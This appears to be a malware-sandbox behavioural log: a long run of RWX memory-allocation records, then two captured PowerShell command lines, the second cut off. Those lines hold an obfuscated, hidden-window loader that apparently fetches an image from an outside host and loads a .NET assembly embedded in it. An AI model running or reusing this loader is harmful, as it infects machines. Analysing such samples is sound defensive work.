NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 1638400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a20000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2808
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0201a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2808
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02012000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02022000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b71000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b72000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0204a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02023000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02024000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0205b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02057000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0201b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02055000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02025000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0204c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02980000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02026000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0205c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02045000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02046000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02047000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02048000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02049000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029dd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029de000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029df000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a41000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a43000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a44000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('USoxM','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline powershell -command "$Codigo = 'JUSoxMBpUSoxMG0USoxMYQBnUSoxMGUUSoxMVQByUSoxMGwUSoxMIUSoxMUSoxM9USoxMCUSoxMUSoxMJwBoUSoxMHQUSoxMdUSoxMBwUSoxMHMUSoxMOgUSoxMvUSoxMC8USoxMdwBhUSoxMGwUSoxMbUSoxMBwUSoxMGEUSoxMcUSoxMBlUSoxMHIUSoxMYwBhUSoxMHYUSoxMZQUSoxMuUSoxMGMUSoxMbwBtUSoxMC8USoxMdQB3USoxMHUSoxMUSoxMLwB1USoxMHcUSoxMcUSoxMUSoxM0USoxMDUSoxMUSoxMOQUSoxM4USoxMDQUSoxMNgUSoxMyUSoxMC4USoxMcUSoxMBuUSoxMGcUSoxMJwUSoxM7USoxMCQUSoxMdwBlUSoxMGIUSoxMQwBsUSoxMGkUSoxMZQBuUSoxMHQUSoxMIUSoxMUSoxM9USoxMCUSoxMUSoxMTgBlUSoxMHcUSoxMLQBPUSoxMGIUSoxMagBlUSoxMGMUSoxMdUSoxMUSoxMgUSoxMFMUSoxMeQBzUSoxMHQUSoxMZQBtUSoxMC4USoxMTgBlUSoxMHQUSoxMLgBXUSoxMGUUSoxMYgBDUSoxMGwUSoxMaQBlUSoxMG4USoxMdUSoxMUSoxM7USoxMCQUSoxMaQBtUSoxMGEUSoxMZwBlUSoxMEIUSoxMeQB0USoxMGUUSoxMcwUSoxMgUSoxMD0USoxMIUSoxMUSoxMkUSoxMHcUSoxMZQBiUSoxMEMUSoxMbUSoxMBpUSoxMGUUSoxMbgB0USoxMC4USoxMRUSoxMBvUSoxMHcUSoxMbgBsUSoxMG8USoxMYQBkUSoxMEQUSoxMYQB0USoxMGEUSoxMKUSoxMUSoxMkUSoxMGkUSoxMbQBhUSoxMGcUSoxMZQBVUSoxMHIUSoxMbUSoxMUSoxMpUSoxMDsUSoxMJUSoxMBpUSoxMG0USoxMYQBnUSoxMGUUSoxMVUSoxMBlUSoxMHgUSoxMdUSoxMUSoxMgUSoxMD0USoxMIUSoxMBbUSoxMFMUSoxMeQBzUSoxMHQUSoxMZQBtUSoxMC4USoxMVUSoxMBlUSoxMHgUSoxMdUSoxMUSoxMuUSoxMEUUSoxMbgBjUSoxMG8USoxMZUSoxMBpUSoxMG4USoxMZwBdUSoxMDoUSoxMOgBVUSoxMFQUSoxMRgUSoxM4USoxMC4USoxMRwBlUSoxMHQUSoxMUwB0USoxMHIUSoxMaQBuUSoxMGcUSoxMKUSoxMUSoxMkUSoxMGkUSoxMbQBhUSoxMGcUSoxMZQBCUSoxMHkUSoxMdUSoxMBlUSoxMHMUSoxMKQUSoxM7USoxMCQUSoxMcwB0USoxMGEUSoxMcgB0USoxMEYUSoxMbUSoxMBhUSoxMGcUSoxMIUSoxMUSoxM9USoxMCUSoxMUSoxMJwUSoxM8USoxMDwUSoxMQgBBUSoxMFMUSoxMRQUSoxM2USoxMDQUSoxMXwBTUSoxMFQUSoxMQQBSUSoxMFQUSoxMPgUSoxM+USoxMCcUSoxMOwUSoxMkUSoxMGUUSoxMbgBkUSoxMEYUSoxMbUSoxMBhUSoxMGcUSoxMIUSoxMUSoxM9USoxMCUSoxMUSoxMJwUSoxM8USoxMDwUSoxMQgBBUSoxMFMUSoxMRQUSoxM2USoxMDQUSoxMXwBFUSoxME4USoxMRUSoxMUSoxM+USoxMD4USoxMJwUSoxM7USoxMCQUSoxMcwB0USoxMGEUSoxMcgB0USoxMEkUSoxMbgBkUSoxMGUUSoxMeUSoxMUSoxMgUSoxMD0USoxMIUSoxMUSoxMkUSoxMGkUSoxMbQBhUSoxMGcUSoxMZQBUUSoxMGUUSoxMeUSoxMB0USoxMC4USoxMSQBuUSoxMGQUSoxMZQB4USoxME8USox